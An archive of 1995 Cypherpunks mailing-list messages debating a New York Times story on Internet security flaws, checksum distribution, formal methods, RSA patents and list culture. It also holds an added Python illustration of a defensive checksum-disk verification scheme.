> > > > > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> > > > >
> > > > I'd love to see something in there about most commercial sites being behind
> > > > firewalls without nfs access across the firewall.  This greatly reduces the
> > >
> > >   It might also be worth noting that people accessing the net
> > > via an ISP from home do not typically use NFS either.
> > >
> > 
> > They don't often have the skill/knowledge/concern to verify a PGP checksum
> > to ensure someone didn't patch their browser, either.
> 
>   I don't believe that my posting of PGP signed checksums last night
> is a final solution that will make the world safe for all end users.
> I'm rather insulted that you imply that I do.

That's not what I was saying. The implication of the comments I was
responding to was that "firewalls and ISP users w/o NFS make this whole
issue a non-problem". And I think we all know that's not true. Presumably
if you have a firewall, sure, you have a sysadmin who will check the
integrity of the executable when it is installed behind it.

But ISP users w/o NFS are exactly the unparanoid unwashed masses who would
be perfectly targeted for this type of attack, and even worse would be
the least likely to do checksumming to protect themselves. That is
the only point I was trying to make.

> your disk, then you may be in trouble.  The point is that you and a
> few reporters are running around yelling at the top of your lungs
> that internet commerce is totally doomed because it is possible for
> users to infect their systems with viruses.

In our post I don't believe there was any yelling, or any serious
doom and gloom. Mainly we just were trying to prod people to internalize
that these old protocols we're all still using are soon going to come under
heavy attack now that there is financial incentive to do it.


>   Perhaps you have a solution to offer to this whole problem?

So I am actually quite fond of the idea of a company becoming a well-known
distributor of checksums. Users could either subscribe to a quarterly
bootable CD-ROM which checks out their system. Or a bootable read-only
floppy which causes their modem to call "1-900-CHEKSUM" and download
the needed checksums on demand.

This would be a low-cost thing for the user, doing it once every few months
it would be pretty low hassle. Spoofing the phone line is a risk that I
can live with, as can I live with the risk of someone spoofing these
CD-ROMs that are mailed out 4 times a year.

And please, cypherpunks, don't start talking about "oh, but your CMOS
could have a trojan in it", and "do you really trust your boot code
in your SCSI". Because, yes, I sure do trust those things. And I think
it's entirely reasonable to trust them for the purposes we're discussing.

There are of course ways to minimize these attacks through crypto.
If you do have the correct CD-ROM/boot disk it can easily authenticate
the party on the other side of the phone. No phone spoofing.

To minimize the chances of getting a spoofed copy of the disk in
the mail, enclose a magic cookie inside the box. The magic cookie
must appear on the mailing label of the next box otherwise the user
is suspicious. Some other random sugar and now the user can tell if
they are getting legit disks as long as their first disk was legit,
and someone isn't opening their mail in a specific attempt to attack
them.

Paul
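
The mailed-disk scheme proposed in the message above, as an added Python example that is not part of the original post: each box carries a fresh cookie sealed inside, the next box must show that cookie on its label, and files are audited only against the checksum list from an accepted box. The Box, Publisher and Subscriber names, the one-chain-per-subscriber model, the 16-byte random cookies, SHA-256 as the checksum and the sample file bytes are assumptions of this example; the "other random sugar" the message mentions is not modelled.

```python
"""Cookie-chained checksum disks: added illustration of the proposal above."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


@dataclass(frozen=True)
class Box:
    label_cookie: Optional[bytes]  # printed on the outside; None on the first box
    inside_cookie: bytes           # sealed inside; must appear on the next label
    checksums: dict                # file name -> hex SHA-256 of the good file


class Publisher:
    """Checksum distributor, keeping one cookie chain per subscriber."""

    def __init__(self):
        self._last_inside = None

    def ship(self, checksums):
        box = Box(self._last_inside, secrets.token_bytes(16), dict(checksums))
        self._last_inside = box.inside_cookie
        return box


class Subscriber:
    def __init__(self):
        self._expected_label = None  # cookie found inside the last accepted box
        self._checksums = {}

    def receive(self, box):
        if self._expected_label is None:
            # First box: there is no earlier cookie, so it is taken on trust.
            verdict = "accepted-first-unverified"
        elif box.label_cookie is not None and hmac.compare_digest(
                box.label_cookie, self._expected_label):
            verdict = "accepted"
        else:
            return "rejected"  # keep the old cookie and the old checksum list
        self._expected_label = box.inside_cookie
        self._checksums = dict(box.checksums)
        return verdict

    def audit(self, files):
        """Return names whose contents differ from the accepted checksum list."""
        bad = []
        for name, data in files.items():
            expected = self._checksums.get(name)
            if expected is None or not hmac.compare_digest(
                    expected, sha256_hex(data)):
                bad.append(name)
        return sorted(bad)


# Constructed sample data standing in for real executables.
GOOD = b"constructed bytes of the vendor's browser build"
PATCHED = b"constructed bytes of a tampered browser build"


def demo_mailings():
    publisher, user = Publisher(), Subscriber()
    results = [user.receive(publisher.ship({"browser": sha256_hex(GOOD)}))]
    # A spoofed disk from someone who never saw inside the previous box:
    # the label cookie can only be guessed, so the box is refused.
    forged = Box(secrets.token_bytes(16), secrets.token_bytes(16),
                 {"browser": sha256_hex(PATCHED)})
    results.append(user.receive(forged))
    results.append(user.receive(publisher.ship({"browser": sha256_hex(GOOD)})))
    results.append(user.audit({"browser": PATCHED}))
    return results


if __name__ == "__main__":
    print(demo_mailings())
```

The first box is accepted with nothing to check it against, matching the condition in the message that the first disk was legitimate. A box lost in the mail also breaks the chain, because the following label then carries a cookie the subscriber never received.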



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 12 Oct 95 08:56:59 PDT
To: perry@piermont.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121454.KAA20694@jekyll.piermont.com>
Message-ID: <199510121551.IAA14535@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Well, in addition, universal deployment of Photuris and IPSP would
> probably prevent the sort of active attack being discussed because you
> could no longer replace the packets.

	Do you think the major OS/router vendors are going to
implement IPSP in their stacks with standing export restrictions? I
don't think so. Seems like that's the thing the article should have
stressed.

> 
> > As for the article - 9/10 scaring people, 1/10 semi-fact.  Be serious?  NFS
> > is not the basic structure of the Internet.  I'm embarrassed that an article
> > so weak in its explanations and so high on fluff appeared on the front page
> > of a well respected newspaper.
> 
> It was surprisingly weak for a John Markoff story (he usually gets the
> details exactly right) but it is an issue that had to be brought up
> and I see no reason to call it a bad article overall. The alarmism is
> needed -- people have to get off their asses (including me).
>  
> Perry
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rubin@faline.bellcore.com (Aviel D Rubin)
Date: Thu, 12 Oct 95 06:06:02 PDT
To: cypherpunks@toad.com
Subject: Follow-up to sci.crypt posting that prompted NYT article
Message-ID: <199510121305.JAA27503@faline.bellcore.com>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday, a New York Times article cited a posting by several
graduate students at Berkeley about the insecurity of the Internet.

We found the sci.crypt posting very interesting and relevant because we 
spent a good portion of the summer working to address the same problem.
Namely, detection of the malicious (or other) modification 
of an executable in transit over an untrusted network. In particular,
we believe that our system could be used to solve the NFS problem
mentioned in the posting from Berkeley.

Our paper can be accessed at

   ftp://thumper.bellcore.com/pub/rubin/stretch.ps

Avi Rubin <rubin@bellcore.com>
Trent Jaeger <jaegert@eecs.umich.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 12 Oct 95 06:24:18 PDT
To: adam@homeport.org (Adam Shostack)
Subject: Internet holes
In-Reply-To: <199510121157.HAA07110@homeport.org>
Message-ID: <9510121321.AA18371@all.net>
MIME-Version: 1.0
Content-Type: text


> | There are also several papers there on "Internet Holes" under Network
> | Security in the same on-line journal.  Every month, another 5-10 holes
> | are added to those published in this forum.
> 
> 	And how many of those holes are published by bugtraq/CERT/8lgm
> first? Just curious to see if this is another list I should be on...

I am writing a series of articles - one per month - for Network Security
Magazine, and am putting last month's article up as they publish the next
one.  Probably 20% have appeared on bugtraq, etc.

All I am doing is going through the TCP/IP protocols (and other such
stuff) one at a time, writing a short piece on each, describing the most
obvious holes, giving some ideas of how they have been/can be exploited,
and describing in general terms what we might do to fix them.  Next
issue covers NNTP - then comes a 2-month (I think) issue on TCP as a
protocol (lots of holes there) - then whatever strikes my fancy next.  I
figure it will take a few years at this rate to get through the most
important protocols and services.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 09:18:41 PDT
To: cypherpunks@toad.com
Subject: Re: Pointer to 10/9/95 EE Times Article
Message-ID: <aca28d2801021004cdec@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 PM 10/11/95, Anonymous wrote:

>"According to the group's moderator, who prefers to remain anonymous,
> `The most important means to the defense of privacy is encryption.
> Cypherpunks are therefore devoted to cryptography.  They wish to learn
> about it, to teach it and to implement it.'"
>
>Ok, since when is the Cypherpunk's mailing list moderated?
>
>It is apparent that the author, Larry Lange, has never studied the
>list closely or he would know how amusing this sounds...
>
>(Geez, if he had ever read one of Tim May's posts on the subject... :-)

I have a theory about this.

First, I recognize the style of the quote, as no doubt many of you do.

Second, my guess is that the reporter contacted the person being quoted,
asked "What is your role?," couldn't interpret the answer given, and so
used the only term he understood. Namely, leader or moderator.

Anarchies are tough for hierarchical minds to grasp.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 06:48:17 PDT
To: madden@mpi-sb.mpg.de>)
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510111335.JAA17959@panix.com>
Message-ID: <199510121346.JAA17394@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de> writes:
> The real problems lie with specifying the
> program/problem correctly in the first place (so-called specifications
> capture), and with automatic program *synthesis* from specifications
> (which, in mathematical theorem proving terms, presents the problem of
> creating existential objects, as opposed to just verifying that they
> do the right job).

Bugs in specifications are just as easy for humans to produce as bugs
in implementations, and unfortunately there is no way for our machines
to psychically intuit what it was we wanted to specify that they do
any more than we can make them intuit what it was we wanted them to
do.

Remember, by the way, that in some sense a high level programming
language *is* a specification language. Automatic synthesis from
"specifications" is just a higher level of programming language, with
all that entails.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 06:54:22 PDT
To: madden@mpi-sb.mpg.de>)
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510111336.JAA17969@panix.com>
Message-ID: <199510121354.JAA17405@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de> writes:
>  Applications of formal methods in software engineering depend
> critically on the use of automated theorem provers to provide improved
> support for the development of safety critical systems.  Potentially
> catastrophic consequences can derive from the failure of computerized
> systems upon which human lives rely such as medical diagnostic
> systems, air traffic control systems and defence systems (the recent
> failure of the computerized system controlling the London Ambulance
> Service provides an example of how serious software failure can be).

I far prefer trusting robust and failsafe engineering in such
situations. Theorem provers can't account for what happens when the
one in a billion DRAM corruption occurs, or someone kicks the cable
connecting the machine to its disks, or when a nut shoots the sensors,
or whatever. Well built systems fail in a safe manner because of good
engineering design -- as an example, in we hope that the motor
controller might die but the motor won't eat itself anyway no matter
what garbage it puts out. Such design is needed whether the systems
are "formally proven" or not -- and frankly, I can't see formal proofs
having much of an impact given that you are in the end simply shifting
the problem to bug-free specifications and yet still have to worry
about failures in the system.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 09:46:07 PDT
To: cypherpunks@toad.com
Subject: Markoff (was: NYT on Internet Flaws)
Message-ID: <aca2918002021004d32c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I counted 7 entities copied on the original of this, and have trimmed the
distribution list down to just the Cypherpunks list.)


At 10:23 AM 10/12/95, Mark wrote:
>>> Not possible. Reporters don't call you for a quote and then send you a draft
>>> of the article for your approval before they publish. They call for a quote,
>>> write their article, and publish, not asking for approval.
>>
>>Depends how well you train them !
>
>Let's train them. Someone post their email addresses so we can send them all
>the RFCs for their education. :) They need to know what the hell they are
>talking about.
>
>I wonder if the biology lists get this, some wannabe hero posting how billions
>of people are infected with deadly toxins just because some researcher
>mentioned a well known fact that an amount of various bacteria and toxins
>exist in all living mammals.


John Markoff knows more about crypto and security and knows more of the
folks working in crypto and security than most of us on this list. In
addition to breaking the Clipper story (*), he also has broken several of
the most important crypto/security stories the Net has seen.

(* Though several of us, including myself, saw the precursors to Clipper
many months prior to its announcement.)

I urge folks to check out his many stories on crypto and security in the
NYT before dismissing him as some ignoramus that needs educating.

(Not that we all don't need more educating, often enough.)

Disagreeing with the tone of a story is fine, even disagreeing with the
basic message or facts is normal. After all, we disagree on this list about
many things (witness the MITM debates).

We also now have commercial interests represented on this list in fairly
important ways, so this often raises the stakes--and the temperature--in
disputes.

But disputes are best handled by arguments as to the points in dispute, not
by insults about the ignorance or cluelessness of the folks involved.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 12 Oct 95 07:18:09 PDT
To: perry@piermont.com
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510121354.JAA17405@jekyll.piermont.com>
Message-ID: <9510121415.AA20611@all.net>
MIME-Version: 1.0
Content-Type: text


> Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de> writes:
> >  Applications of formal methods in software engineering depend
> > critically on the use of automated theorem provers to provide improved
> > support for the development of safety critical systems.  Potentially
> > catastrophic consequences can derive from the failure of computerized
> > systems upon which human lives rely such as medical diagnostic
> > systems, air traffic control systems and defence systems (the recent
> > failure of the computerized system controlling the London Ambulance
> > Service provides an example of how serious software failure can be).

and Perry responds:
> I far prefer trusting robust and failsafe engineering in such
> situations. Theorem provers can't account for what happens when the
> one in a billion DRAM corruption occurs, or someone kicks the cable
> connecting the machine to its disks, or when a nut shoots the sensors,
> or whatever. Well built systems fail in a safe manner because of good
> engineering design -- as an example, in we hope that the motor
> controller might die but the motor won't eat itself anyway no matter
> what garbage it puts out. Such design is needed whether the systems
> are "formally proven" or not -- and frankly, I can't see formal proofs
> having much of an impact given that you are in the end simply shifting
> the problem to bug-free specifications and yet still have to worry
> about failures in the system.

Hence comes my response:

I think that both formal methods and defense-in-depth are important
in building an effective protection program.

	- Formal methods are very important for detecting flaws and
	  producing what is commonly called "Fault Intolerance", but

	- Defense-in-depth is important because there are no perfect
	  technical defenses.  This is commonly called "Fault Tolerance"

The most secure (and often highest quality) systems combine fault
intolerance with fault tolerance to produce high quality parts and a
system that continues operating safely even when those high quality
parts fail.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 10:14:42 PDT
To: cypherpunks@toad.com
Subject: Commercialism on Cypherpunks
Message-ID: <aca2962403021004ea77@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



We face interesting times.

It's apparent that the Cypherpunks list is now becoming even more of a
hangout for reporters, commercial vendors, and those seeking advance
knowledge of security holes and whatnot...maybe even a few stock traders
looking for tips :-}. It was this way to some extent a few years ago, with
Steven Levy, John Markoff, Kevin Kelly, Julian Dibbell, and others looking
to our list for stimulating ideas for stories. Now, the time between
something being posted here and its headline appearance in one of the major
papers is even shorter. The "electronic commerce" business is heating up,
and basic flaws and limitations are obviously big news.

And the list has grown in recent months, as publicity has increased.

In addition to the usual corporate connections that people have because
some corporation employs them, we have people _directly_ involved in
several crypto-related or security-oriented businesses, including Netscape
Communications, Digicash, First Virtual, Enterprise Integration
Technologies, RSADSI, Verity, Intuit, and so on. And a bunch of folks of
course from Sun, SGI, Apple, Microsoft, etc. (Sorry if I've left out your
company.)

Clearly some of these groups have conflicting goals and approaches. Some
have different exposures to security holes. Some of these electronic
commerce companies even stand to gain at the expense of others when
security problems are found.

Some of the commercial folks are concerned that the freewheeling, anarchic,
"say anything" nature of the Cypherpunks list is sometimes reflecting badly
on their companies. Some are concerned that reporters are reading the list
to find leads for stories.

Well, get used to it! (Lest you think I was going to pull a Rodney King and
say "Can't we all just get along?," I'm taking the anarchist route.)

People will say what they wish. Sometimes they'll speak inaccurately,
sometimes without all of the facts. Such is life.

There is no moderator, no leader, contrary to what at least one reporter
seems to think. And it's a good thing, as I could otherwise see that
moderator or leader someday being served with papers because of some insult
or denigration about a company or its products posted here. With the
"electronic commerce" market heating up so much, and with our list becoming
one of the several de facto watering holes where gossip and G-2 gets
exchanged, there are bound to be conflicts and alleged damages to
reputations.

Think of our list as a kind of Casablanca, a "free city" not controlled by
any side. I'm "shocked, simply shocked," that anyone would think it could
be anything else.


--Tim, owner since 1992 of "Rick's Place"

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )Steve Orrin@ix.netcom.com, Mgr.Tech.Services@ix.netcom.com,       PrivaSoft@ix.netcom.com
Date: Thu, 12 Oct 95 10:33:52 PDT
To: cypherpunks@toad.com
Subject: responce to graphic encryption replies
Message-ID: <199510121733.KAA18977@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


   First, I would like to address the issue of David C.'s spam of the
usenet. Mr. Clavedetcher does not work for nor does he represent us in
any way. After receiving word from Cypherpunks that he had spammed the
list I personally contacted him and informed him to cease and desist
these actions or face legal action. We at PrivaSoft do not conduct nor
condone such actions on the Net. During my conversation with him I
discovered he was a zealous individual looking to make good on our
rebate program, as per our Web page. If you should receive any further
spams from him or any other overzealous netuser, please contact me
immediately. Also if you could inform me of other newsgroups/lists he
spammed so I may contact them as well regarding this. Thanx.

    Second I would like to begin addressing several of the issues 
raised by my inquiry of Graphic Encryption. Firstly Graphic Encryption 
is the scrambling of a graphic image using an encryption algorithm. In 
PrivaSoft's case the Image is that of your document, including all text 
and graphics contained therein. Syntel Sciences, the distributor of 
PrivaSoft, does not wish to publish its algorithm at this time, however 
if there is any question as to the strength of PrivaSoft and its 
Graphic Encryption engine, I would be happy to post a sample document 
for you to try and crack. Also, I have recently put together an info 
sheet on the Security provided by PrivaSoft which I can post if there 
is interest. 

    One of the key strengths, as I see it, of graphic encryption is
that during decryption via hacking, there is an added time element when
a human interface is required to verify the product (since it is a
graphic picture being produced, regular checksums for intelligible
words can't be used sans implementing OCR); even if this is only 10
milliseconds per try this increases the time to crack exponentially
beyond that of a data encrypted document of similar key length and
algorithm strength.

    Once again I would like to apologize on behalf of Syntel Sciences - 
PrivaSoft for the nuisance caused by the spam done by David C. and I 
wish to reiterate that such actions are not condoned by us and will not 
be tolerated.

Steve Orrin
Mgr. Tech. Services,  PrivaSoft

*************************************************
PrivaSoft TM                                    *
Distributed by Syntel Sciences, Inc. USA        *
1877 Springfield Ave PO BOX 600                 *
 Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 12 Oct 95 07:38:01 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <v02120d04aca21d2bcd71@[199.2.22.120]>
Message-ID: <wkTGSPCMc50eA1MGoJ@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 11-Oct-95 Re: NYT on Internet Flaws Douglas
Barnes@communiti (1042*)

> It is profoundly irritating to find this splashed on the
> front page of the NYT, contributing to the FUD that
> largely benefits luddites like First Virtual and
> those, like MS$, pushing for a return to proprietary networks.

???Luddites???  Excuse me, have I missed something?  Let's look at FV's
founders:

-- Einar Stefferud is one of the grand old men of the Internet, a major
contributor to Internet standards efforts for over 20 years, and a
behind the scenes player in almost every major email-related development
in the last 20 years.

-- Marshall Rose is the author of SNMP, lots of widely used software,
and six books on Internet-related technology.  He's been a major factor
for progress in IETF and Interop for many years.

-- I'm one of the authors of MIME and lots of widely used software.  I
am most commonly criticized for being technology-crazy, as in the
multimedia excesses of the CMU Andrew system, rather than for being a
Luddite.

Collectively, I'd venture to say that FV's people have pushed the
Internet envelope more than any other similarly-sized group of people
you could find anywhere on the planet.  And in our current incarnation,
we deployed the first Internet-wide open payment system, and have run it
through a year (this coming Sunday) of exponential growth with only a
few days of downtime.

As I understand it, a "Luddite" is someone who is unreasonably opposed
to technological innovation.  The only thing I can assume is that, in
your lexicon, "Luddite" is synonymous with "sees problems with the
deployment of public key encryption technology to the masses".  If
believing that cryptography isn't magic and isn't a perfect solution to
all problems makes us Luddites, then we're Luddites.  

In point of fact, we're very heavy users of cryptography internally, we
have just chosen not to make all our users master its subtleties.  Watch
for the first visible use of cryptography in our system, coming soon --
we're going to push the envelope in the safe deployment of cryptography,
too.  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 12 Oct 95 10:47:43 PDT
To: cypherpunks@toad.com
Subject: Re: RSA Data Security, Inc. To Exclusively License Rights to RSA
In-Reply-To: <9509128135.AA813510342@snail.rsa.com>
Message-ID: <199510121746.KAA07243@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> writes:

>REDWOOD CITY, Calif.--(BUSINESS WIRE)--Oct. 12, 1995--RSA Data Security, Inc. 
>today announced that it is now licensing patents for the Digital Signature 
>Standard (DSS), the U.S. government standard for digital signatures.

I'm sure that everyone will join me in a rousing Bronx cheer for RSA as
they continue their efforts to monopolise public key cryptography.  If
they truly have a patent on DSS this will be yet another important
algorithm for which people have to get RSA's permission.  RSA is fast
entering the list of such well loved institutions as the Post Office and
the Internal Revenue Service as one of those places you can't avoid
dealing with no matter how you try.

"Ever been sued for patent infringement?
You will!
And the company that will stick it to you?
RSA."

Hal, the intemperate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 17:49:49 PDT
To: raph@CS.Berkeley.EDU (Raph Levien)
Subject: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510012231.PAA00669@kiwi.cs.berkeley.edu>
Message-ID: <199510120047.KAA13489@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hello Raph Levien <raph@CS.Berkeley.EDU>

You write:
> Here is a draft of the CJR I intend to file, for the perl-RSA t-shirt.
...

IANAL, and I know absolutely *nothing* about what a CJR should look like.

...
> ORIGIN OF COMMODITY
...
> The cryptographic algorithm implemented in this t-shirt comes from
> various sources, at various times, and was produced with both private
> and public sources of funding.

I don't think this is accurate: I guess this applies to the book
which contains several algorithms. As far as I know, the RSA alg.
comes from one source at one time.

...
> CURRENT USE
> 
> The t-shirt is intended as an implementation of the RSA cipher for
> those who wish to incorporate encryption into their communications.
> The small size of the implementation makes it particularly useful in
> contexts in which existing cryptographic infrastructure is not
> available.
...

Perhaps somebody should make IDEA shorts?

Then it would be interoperable with PGP...
(Would tooooo. You just have to remember what the header is.)


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHxllCxV6mvvBgf5AQEN8wQApplb/R+FLZcUU4ro6c8d4DIcCYK0KIbT
5LGfhtq5tN9IJPZ/00Z/otHDBztD+PDEzC2KI2EI724FEOAtvHR6ZnopkWcST500
2Ly/OEJJ+oAO2IyOkbyJ3AQCax6RkCGLrFiSGSi4N5Z24ZZ3Ovp+LTzqxyEF/81y
6Vu1dRK1Zuk=
=3J6S
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 07:55:15 PDT
To: David Berger <dvberger@eit.com>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510111812.LAA21331@viper.eit.com>
Message-ID: <199510121454.KAA20694@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David Berger writes:
> As a result, the only thing I think this article should say is that we need
> secure ftp.  Isn't this being worked on?

Well, in addition, universal deployment of Photuris and IPSP would
probably prevent the sort of active attack being discussed because you
could no longer replace the packets.

> As for the article - 9/10 scaring people, 1/10 semi-fact.  Be serious?  NFS
> is not the basic structure of the Internet.  I'm embarrassed that an article
> so weak in its explanations and so high on fluff appeared on the front page
> of a well respected newspaper.

It was surprisingly weak for a John Markoff story (he usually gets the
details exactly right) but it is an issue that had to be brought up
and I see no reason to call it a bad article overall. The alarmism is
needed -- people have to get off their asses (including me).
 
Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Wed, 11 Oct 95 18:17:34 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix POTP
In-Reply-To: <199510111433.KAA46776@tequesta.gate.net>
Message-ID: <9510120118.AA45953@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

liberty@gate.net (Jim Ray) wrote:
  and Kari asked:
  >Maybe you could name those experts who have inspected it - thanks.

  Um, in an earlier post she mentioned the venerable Mr. Kahn and
  someone else whose name I forget.

I noted at the time that I didn't know any of the
names, except Kahn, and only later realised that
this is the Kahn who wrote the book, not the Karn
who is a cryptographer. I don't know whether David
Kahn actually has any credentials at all as a
cryptographer. Does anyone else?

Note I'm not trying to discredit Elementrix POTP,
and especially not David Kahn who wrote a very
important book.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHxs96RQkCwJ0+ZNAQFaOQP+MCk6kEjdwXmWIb56SIo1frZSp3Ynvxul
6TpcEz1PgNHEzHu7DVlwbNiCFc7eCCJpI8kB+pU/bB5q6Q4G88DNfmULc0NSYApI
QWfer0DuuUrE2mZcknZTRb+3zMrzzd/AjGXnujE2SEODmKtc+1yAYhdgZchRYfTY
w/yiLWpnxgA=
=z10F
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Thu, 12 Oct 95 11:59:13 PDT
To: cypherpunks@toad.com
Subject: Oct 14 meeting, focus on Java, Mountain View, California
Message-ID: <199510121831.LAA02357@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello again -

First, my sincere apologies for not making it clear in the first 
announcement that the Oct 14 meeting focussing on Java is being
held in the bay area of California.   

Next, feel free to speak up for speaker slots if you're so inclined.
I was surprised no one wrote in to ask for speaker slots although
a lot of people wrote in to ask for more details on where the meeting
was and others wrote in to chastise me (correctly) for being so 
bayAreaCentric. 

Saturday Oct 14

         Time: 12 noon - 6 p.m.

        Place: Sparcy's cafeteria, building 21, Sun Microsystems
               Mountain View, California

  AgendaSoFar: 12 - 12:15    - Settle in, have a bagel
	       12:15 - 12:45 - Overview of Java/HotJava
	       12:45 - 2:00  - Java Security Model, Sami Shaio, Java group, Sun
	        2:00 - 3:00  - discussion, Q&A, open mike
		3:00 - 3:30  - break
		3:30 - 4:30  - Jcrypt, Doug Barnes, Amanda Chou
		4:30 - 6:00  - TBD

   Directions: Take 101 to Amphitheater Parkway.  Turn left
               onto Garcia, and drive about 1/2 mile and turn
               onto the first genuine side street which is
	       named Marina Way.   Drive about 1/4 mile and look 
	       for a right hand turn onto Coast.   Building 21
	       will be on your left.  It's on the corner of Coast
	       and Marina Way.   There's plenty of parking there. 

